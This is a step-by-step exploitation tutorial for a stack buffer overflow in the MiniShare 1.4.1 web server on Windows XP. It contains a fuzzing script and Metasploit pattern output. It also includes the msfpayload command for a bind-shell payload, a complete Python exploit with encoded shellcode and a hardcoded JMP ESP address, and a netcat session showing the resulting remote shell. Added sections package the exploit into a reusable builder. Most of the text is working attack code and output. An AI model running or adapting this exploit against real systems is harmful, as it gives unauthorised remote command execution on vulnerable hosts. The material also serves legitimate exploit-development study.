Win32 Exploitation

Prerequisite
 MiniShare 1.4.1
 Debugger (I use Immunity Debugger)
 Windows XP (victim)
 Linux (with Python, Metasploit and nc installed)
 
Running minishare
MiniShare is a minimal HTTP server that lets you browse and download files through a web browser. It needs no installation; just run the .exe on the Windows XP machine.

Fuzzing minishare
MiniShare 1.4.1 is vulnerable to a stack-based buffer overflow when it receives a GET request with an overly long path. To trigger it, send such a request with the following Python script (run it from the Linux machine with the victim's IP address as the argument):
 
 
#!/usr/bin/env python
import socket, sys

# Send a GET request whose path is 2000 'A's. MiniShare 1.4.1 copies the
# path into a fixed-size stack buffer, so this is enough to crash it.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
buffer = b"GET "
buffer += b"A" * 2000
buffer += b"HTTP/1.1\r\n\r\n"
s.send(buffer)
s.close()
 
 
On the Windows XP machine, MiniShare crashes.
To see what was overwritten, attach MiniShare to Immunity Debugger and run the script again.
EIP is overwritten with 41414141 (AAAA in ASCII), so the saved return address is under our control.
To find the exact offset of EIP inside the buffer, generate a unique, non-repeating pattern with pattern_create.rb from Metasploit:
 
 
 root@kth-kali:/usr/share/metasploit-framework/tools# ./pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

 
 
Copy the pattern and use it in place of "A"*2000.
Run the script again.
This time EIP holds a value taken from the pattern; in this run it was 36684335 (it will differ if you use a different pattern length).
To turn that value into an offset, use pattern_offset.rb:
 
 
 root@kth-kali:/usr/share/metasploit-framework/tools# ./pattern_offset.rb 36684335
 [*] Exact match at offset 1787
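As an added example (not part of the original write-up), here is the logic behind pattern_create.rb and pattern_offset.rb in Python 3, so the offset can be verified without Metasploit. The crash value 36684335 from the run above is used as the sample input. The x86 stack is little-endian, so the four bytes shown in EIP are reversed before they are searched for in the pattern; getting that reversal wrong is the usual reason pattern_offset reports no match:

```python
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Build a Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0...Zz9.

    Every 4-byte window of the pattern is unique, which is what lets a
    register value be mapped back to a single offset.
    """
    out = []
    total = 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out.append(u + l + d)
                total += 3
                if total >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def register_to_needle(value):
    """Convert a register value as shown by the debugger into the 4 ASCII
    characters that sit in memory.

    `value` may be the raw 4-character string (e.g. "5Ch6") or the hex value
    from EIP (e.g. "36684335" or "0x36684335"). A 32-bit little-endian
    register stores its least-significant byte at the lowest address, so
    the hex bytes are reversed to recover the order they had in the buffer.
    """
    if len(value) == 4:
        return value
    hexval = value.lower()
    if hexval.startswith("0x"):
        hexval = hexval[2:]
    return bytes.fromhex(hexval)[::-1].decode("ascii")


def pattern_offset(value, length=2000):
    """Return the offset of the crash value within the pattern, or -1 if
    the value did not come from the pattern (e.g. 41414141 from plain A's)."""
    return pattern_create(length).find(register_to_needle(value))


if __name__ == "__main__":
    # Sample input: the EIP value observed in the MiniShare crash above.
    print(pattern_offset("36684335"))
```

The search is over the full 2000-byte pattern rather than the whole character set, so an EIP value that lies beyond the length you actually sent is reported as no match instead of a misleading offset.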
 
Now that we have the offset (1787 bytes of junk, then the 4 bytes that land in EIP), generate the shellcode. The payload is a bind shell, encoded with the bad characters \x00 and \x0d excluded, since either would terminate or corrupt the request before it reaches the vulnerable copy:
 
 
 
 
 
root@kth-kali:~# msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b "\x00\x0d" -t c
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

unsigned char buf[] =
"\xbe\x6d\xab\x4c\xb3\xdb\xc2\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x56\x31\x77\x13\x83\xc7\x04\x03\x77\x62\x49\xb9\x4f\x94\x04"
"\x42\xb0\x64\x77\xca\x55\x55\xa5\xa8\x1e\xc7\x79\xba\x73\xeb"
"\xf2\xee\x67\x78\x76\x27\x87\xc9\x3d\x11\xa6\xca\xf3\x9d\x64"
"\x08\x95\x61\x77\x5c\x75\x5b\xb8\x91\x74\x9c\xa5\x59\x24\x75"
"\xa1\xcb\xd9\xf2\xf7\xd7\xd8\xd4\x73\x67\xa3\x51\x43\x13\x19"
"\x5b\x94\x8b\x16\x13\x0c\xa0\x71\x84\x2d\x65\x62\xf8\x64\x02"
"\x51\x8a\x76\xc2\xab\x73\x49\x2a\x67\x4a\x65\xa7\x79\x8a\x42"
"\x57\x0c\xe0\xb0\xea\x17\x33\xca\x30\x9d\xa6\x6c\xb3\x05\x03"
"\x8c\x10\xd3\xc0\x82\xdd\x97\x8f\x86\xe0\x74\xa4\xb3\x69\x7b"
"\x6b\x32\x29\x58\xaf\x1e\xea\xc1\xf6\xfa\x5d\xfd\xe9\xa3\x02"
"\x5b\x61\x41\x57\xdd\x28\x0e\x94\xd0\xd2\xce\xb2\x63\xa0\xfc"
"\x1d\xd8\x2e\x4d\xd6\xc6\xa9\xb2\xcd\xbf\x26\x4d\xed\xbf\x6f"
"\x8a\xb9\xef\x07\x3b\xc1\x7b\xd8\xc4\x14\x2b\x88\x6a\xc6\x8c"
"\x78\xcb\xb6\x64\x93\xc4\xe9\x95\x9c\x0e\x9c\x91\x52\x6a\xcd"
"\x75\x97\x8c\xe0\xd9\x1e\x6a\x68\xf2\x76\x24\x04\x30\xad\xfd"
"\xb3\x4b\x87\x51\x6c\xdc\x9f\xbf\xaa\xe3\x1f\xea\x99\x48\xb7"
"\x7d\x69\x83\x0c\x9f\x6e\x8e\x24\xd6\x57\x59\xbe\x86\x1a\xfb"
"\xbf\x82\xcc\x98\x52\x49\x0c\xd6\x4e\xc6\x5b\xbf\xa1\x1f\x09"
"\x2d\x9b\x89\x2f\xac\x7d\xf1\xeb\x6b\xbe\xfc\xf2\xfe\xfa\xda"
"\xe4\xc6\x03\x67\x50\x97\x55\x31\x0e\x51\x0c\xf3\xf8\x0b\xe3"
"\x5d\x6c\xcd\xcf\x5d\xea\xd2\x05\x28\x12\x62\xf0\x6d\x2d\x4b"
"\x94\x79\x56\xb1\x04\x85\x8d\x71\x34\xcc\x8f\xd0\xdd\x89\x5a"
"\x61\x80\x29\xb1\xa6\xbd\xa9\x33\x57\x3a\xb1\x36\x52\x06\x75"
"\xab\x2e\x17\x10\xcb\x9d\x18\x31";

 
Take the shellcode and use it in the following script. (The bytes in the script differ from the msfencode output above because shikata_ga_nai produces a different encoding on every run; both decode to the same bind shell.)
 
 
 
 
#!/usr/bin/env python
import socket, sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))

buffer = b"GET "
buffer += b"A" * 1787          # junk up to the saved return address (offset from pattern_offset.rb)
buffer += b"\x65\x82\xa5\x7c"  # 0x7ca58265, JMP ESP in shell32.dll, written little-endian
buffer += b"\x90" * 20         # NOP sled; ESP points here after the JMP ESP
# windows/shell_bind_tcp (listens on 4444), shikata_ga_nai encoded, bad chars \x00\x0d excluded
buffer += (b"\xb8\xc1\xc9\xb4\x11\xd9\xc4\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
           b"\x56\x31\x42\x13\x03\x42\x13\x83\xea\x3d\x2b\x41\xed\x55\x25"
           b"\xaa\x0e\xa5\x56\x22\xeb\x94\x44\x50\x7f\x84\x58\x12\x2d\x24"
           b"\x12\x76\xc6\xbf\x56\x5f\xe9\x08\xdc\xb9\xc4\x89\xd0\x05\x8a"
           b"\x49\x72\xfa\xd1\x9d\x54\xc3\x19\xd0\x95\x04\x47\x1a\xc7\xdd"
           b"\x03\x88\xf8\x6a\x51\x10\xf8\xbc\xdd\x28\x82\xb9\x22\xdc\x38"
           b"\xc3\x72\x4c\x36\x8b\x6a\xe7\x10\x2c\x8a\x24\x43\x10\xc5\x41"
           b"\xb0\xe2\xd4\x83\x88\x0b\xe7\xeb\x47\x32\xc7\xe6\x96\x72\xe0"
           b"\x18\xed\x88\x12\xa5\xf6\x4a\x68\x71\x72\x4f\xca\xf2\x24\xab"
           b"\xea\xd7\xb3\x38\xe0\x9c\xb0\x67\xe5\x23\x14\x1c\x11\xa8\x9b"
           b"\xf3\x93\xea\xbf\xd7\xf8\xa9\xde\x4e\xa5\x1c\xde\x91\x01\xc1"
           b"\x7a\xd9\xa0\x16\xfc\x80\xac\xdb\x33\x3b\x2d\x73\x43\x48\x1f"
           b"\xdc\xff\xc6\x13\x95\xd9\x11\x53\x8c\x9e\x8e\xaa\x2e\xdf\x87"
           b"\x68\x7a\x8f\xbf\x59\x02\x44\x40\x65\xd7\xcb\x10\xc9\x87\xab"
           b"\xc0\xa9\x77\x44\x0b\x26\xa8\x74\x34\xec\xdf\xb2\xfa\xd4\x8c"
           b"\x54\xff\xea\x23\xf9\x76\x0c\x29\x11\xdf\x86\xc5\xd3\x04\x1f"
           b"\x72\x2b\x6f\x33\x2b\xbb\x27\x5d\xeb\xc4\xb7\x4b\x58\x68\x1f"
           b"\x1c\x2a\x62\xa4\x3d\x2d\xaf\x8c\x34\x16\x38\x46\x29\xd5\xd8"
           b"\x57\x60\x8d\x79\xc5\xef\x4d\xf7\xf6\xa7\x1a\x50\xc8\xb1\xce"
           b"\x4c\x73\x68\xec\x8c\xe5\x53\xb4\x4a\xd6\x5a\x35\x1e\x62\x79"
           b"\x25\xe6\x6b\xc5\x11\xb6\x3d\x93\xcf\x70\x94\x55\xb9\x2a\x4b"
           b"\x3c\x2d\xaa\xa7\xff\x2b\xb3\xed\x89\xd3\x02\x58\xcc\xec\xab"
           b"\x0c\xd8\x95\xd1\xac\x27\x4c\x52\xdc\x6d\xcc\xf3\x75\x28\x85"
           b"\x41\x18\xcb\x70\x85\x25\x48\x70\x76\xd2\x50\xf1\x73\x9e\xd6"
           b"\xea\x09\x8f\xb2\x0c\xbd\xb0\x96")
buffer += b"HTTP/1.1\r\n\r\n"

s.send(buffer)
s.close()
 
\x65\x82\xa5\x7c is the address 0x7ca58265, written little-endian, of a JMP ESP instruction in shell32.dll on the victim machine. When the overwritten return address is popped, ESP points just past it, i.e. at the NOP sled, so the JMP ESP lands in the sled and slides into the shellcode. The address is specific to the victim's shell32.dll build (Windows XP service pack and language), so find the one for your own target, for example with Immunity's mona plugin (!mona jmp -r esp), and check that it contains none of the bad characters.
windows/shell_bind_tcp listens on port 4444 by default, so you get the shell when you connect with netcat:
 
 
root@kth-kali:~/python# nc 192.168.1.128 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\MiniShare>
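The exploit script above assembles the request by hand. The following added example (my own code, not the original author's) packages the same layout into a function that packs the JMP ESP address with struct instead of hand-reversing the bytes, checks both the address and the shellcode against the bad-character set given to msfencode above, and refuses to build a request that would be truncated. The offset 1787 and the address 0x7ca58265 are the page's values; the 8-byte shellcode is a constructed stand-in (INT3 breakpoints, which trap in the debugger) so the example runs offline. Drop in the real msfencode output on a target:

```python
import socket
import struct

# Bad characters excluded when the shellcode was encoded (from the msfencode
# command above). A NUL or CR anywhere in the request would cut it short
# before the vulnerable copy, so the address and shellcode must avoid them.
BAD_CHARS = b"\x00\x0d"

# Constructed stand-in for the msfencode output: eight INT3 instructions.
# If execution reaches them, Immunity Debugger stops on a breakpoint, which
# confirms the JMP ESP and sled work before the real payload goes in.
STAND_IN_SHELLCODE = b"\xcc" * 8


def find_bad_chars(data, bad_chars=BAD_CHARS):
    """Return [(index, byte)] for every bad character found in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad_chars]


def build_exploit(offset, jmp_esp, shellcode, nop_sled=20):
    """Assemble the overflowing GET request.

    Layout after "GET ": offset bytes of junk, the JMP ESP address (which
    overwrites the saved return address), a NOP sled that ESP points at
    after the jump, then the shellcode.  Raises ValueError if the address
    or shellcode contains a bad character, since such a request would not
    deliver the payload intact.
    """
    ret = struct.pack("<I", jmp_esp)  # little-endian, as x86 stores it in memory
    for name, part in (("return address", ret), ("shellcode", shellcode)):
        hits = find_bad_chars(part)
        if hits:
            raise ValueError("%s contains bad character(s): %r" % (name, hits))
    payload = b"A" * offset + ret + b"\x90" * nop_sled + shellcode
    return b"GET " + payload + b" HTTP/1.1\r\n\r\n"


def send_exploit(host, request, port=80):
    """Deliver the request to MiniShare (hypothetical helper; does not
    verify that the bind shell came up, use nc for that)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.sendall(request)
    s.close()


if __name__ == "__main__":
    import sys
    # Values from the write-up: 1787-byte offset, JMP ESP at 0x7ca58265.
    request = build_exploit(1787, 0x7ca58265, STAND_IN_SHELLCODE)
    if len(sys.argv) > 1:
        send_exploit(sys.argv[1], request)
```

Running the bad-character check on the return address is the step most write-ups skip: 0x7ca58265 happens to be clean, but an address such as 0x7ca58200 would put a NUL byte into the request and silently break the exploit.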

https://www.facebook.com/patriot.k89/videos/vb.100000863016810/994609570577801/?type=3&theater